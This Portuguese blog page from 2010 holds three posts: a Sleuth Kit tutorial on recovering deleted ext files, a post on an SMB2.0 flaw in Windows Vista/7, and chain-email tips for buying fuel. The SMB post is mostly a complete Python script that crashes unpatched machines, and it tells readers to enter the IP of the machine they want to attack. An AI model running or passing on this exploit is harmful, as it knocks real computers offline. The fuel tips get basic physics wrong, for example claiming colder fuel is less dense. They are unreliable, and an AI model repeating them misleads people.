terça-feira, 28 de setembro de 2010

Sleuth Kit - ferramentas para análise forensic

O Sleuth Kit é uma coleção de ferramentas para análise forensic em sistemas de arquivos (file system), para maioress informações e funcionalidades acesse o site oficial http://www.sleuthkit.org/sleuthkit/desc.php.
Este post tem como objetivo mostrar como recuperar arquivos deletados em sistemas de arquivos linux (ext), mas este kit suporta também partições DOS, BSD, MAC, SUN, FAT, NTFS, ISO9660, RAW e SWAP.
Os comandos abaixo devem ser executados como root, se você não estiver logado como root utilize o sudo.
No repositório oficial do Ubuntu o pacote se chama “sleuthkit”, sendo assim:
#aptitude install sleuthkit
Vamos organizar nosso trabalho tudo dentro de um diretório, para isso crie um diretório próprio:
#mkdir ~/recovery
Com comando “fls” podemos listar os arquivos deletados e salvar essa relação dentro de um arquivo, abaixo segue o comando completo:
#fls -f ext -d -r -p /dev/sdb1 > ~/recovery/deletados.txt
-f ext: sistema de arquivos da partição
-d: mostra apenas arquivos e diretorios deletados
-r: busca de forma recursiva
-p: mostra o caminho completo dos arquivos e diretórios
/dev/sdb1: é a partição onde esta o arquivo deletado
del_var.txt: onde estará a lista dos arquivos deletados

Vamos ver a saída do comando acima:
#cat ~/recovery/deletados.txt
r/r * 910452: home/osvaldo/arquivodeletado.txt

Encontramos um arquivo de nome arquivodeletado.txt e inode 910452 que foi deletado, vamos tentar recuperá-lo usando o comando icat, que copia os arquivos pelo número do seu inode, para isso execute o comando abaixo:
#icat -f ext -r -s /dev/sdb1 910452 > ~/recovery/deletedfile.txt

-f ext: sistema de arquivos da partição
-r: recupera arquivos deletados
910452: inode do arquivo deletado
deletedfile.txt: este é o nosso arquivo recuperado

Com isso podemos recuperar os arquivos deletados acidentalmente ou de forma proposital, é uma ótima ferramenta para análises forensic, o único trabalho que você terá é em criar um script que faça isso de forma automática. Dê uma olhada na ferramenta Autopsy Forensic Browser (http://www.sleuthkit.org/autopsy/desc.php), tenho certeza que vai ser muito útil.

By Osvaldo.

Protocolo SMB2.0 é vulnerável

Os produtos da Microsoft são alvos constante de novas descobertas de vulnerabilidades, isso é notório. A vulnerabilidae de que se trata este post é do ano passado (2009), mas infelizmente deve ter alguma máquina com Windows Vista e 7 desatualizada por ai, sendo assim, este Exploit ainda pode causar grandes dores de cabeça. Nas versões a partir do Vista do SO da Microsot veio implementado o protocolo SMBv2, que é usado no compartilhamento de arquivos, impressoras etc. Esta versão do protocolo SMB veio com uma vulnerabilidade na NEGOTIATE PROTOCOL REQUEST, com isso podendo causar a famosa tela azul. Abaixo segue o exploit em python.


------------------- inicio -----------------------
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header
#field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_VITIMA", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

------------------- fim -----------------------

Onde esta escrito “IP_VITIMA” coloque o IP da máquina que deseja atacar.
Copie este código para um arquivo e salve como nome_qualquer.py e depois só é executar:
./nome_qualquer.py

By Osvaldo.

segunda-feira, 27 de setembro de 2010

Truques para Abastecer seu veículo

O autor deste texto trabalha numa refinaria há 31 anos.

Assim que você levar a sério e passar a aplicar os truques que a seguir são explicados, passará a aproveitar ao máximo seu combustível e, portanto, seu dinheiro. Esperamos que lhe sejam proveitosos.



*1º Truque:***Encher o tanque sempre pela manhã, o mais cedo possível.***
A temperatura ambiente e do solo é mais baixa. Todas os postos de combustíveis têm seus depósitos debaixo terra. Ao estar mais fria a terra, a densidade da gasolina e do diesel é menor. O contrário se passa durante o dia, que a temperatura do solo sobe, e os combustíveis tendem a expandir-se. Por isto, se você enche o tanque ao meio dia, pela tarde ou ao anoitecer, o litro de combustível não será um litro exatamente. Na indústria petrolífera a gravidade específica e a temperatura de um solo tem um papel muito importante. Onde eu trabalho, cada carregamento de combustível nos caminhões é cuidadosamente controlada no que diz respeito à temperatura. Para que, a cada galão vertido no depósito (cisterna) do caminhão seja exato.


*2º Truque:Quando for pessoalmente encher o tanque, não aperte a pistola ao máximo (pedir ao frentista no caso de ser servido). Segundo a pressão que se exerça sobre a pistola, a velocidade pode ser lenta, média ou alta. Prefira sempre o modo mais lento e poupará mais dinheiro. Ao encher mais lentamente, cria-se menos vapor, e a maior parte do combustível vertido converte-se num cheio real, eficaz. Todas as mangueiras vertedoras de combustível devolvem o vapor para o depósito. Se encherem o tanque apertando a pistola ao máximo uma percentagem do precioso líquido que entra no tanque do seu veículo se transforma em vapor do combustível, já contabilizado, volta pela mangueira de combustível (surtidor) ao depósito da estação. Isso faz com que, os postos consigam recuperar parte do combustível vendido, e o usuário acaba pagando como se tivesse recebido a real quantidade contabilizada, menos combustível no tanque pagando mais dinheiro.



*3º. Truque:Encher o tanque antes de que este baixe da metade.***Quanto mais combustível tenha no depósito, menos ar há dentro do mesmo. O combustível se evapora mais rapidamente do que você pensa. Os grandes depósitos cisterna das refinarias têm tetos flutuantes no interior, mantendo o ar separado do combustível, com o objetivo de manter a evaporação ao mínimo.



*4º Truque:Não encher o tanque quando o posto de combustíveis estiver sendo reabastecido e nem imediatamente depois.***Se chega você ao posto de combustíveis e vê um caminhão tanque que está abastecendo os depósitos subterrâneos do mesmo, ou os acaba de reabastecer, evite, se puder, abastecer no dito posto nesse momento. Ao reabastecer os depósitos, o combustível é jorrado dentro do depósito, isso faz com que o combustível ainda restante nos mesmos seja agitado e os sedimentos assentados ao fundo acabam ficando em suspensão por um tempo.Assim sendo você corre o risco de abastecer seu tanque com combustível sujo.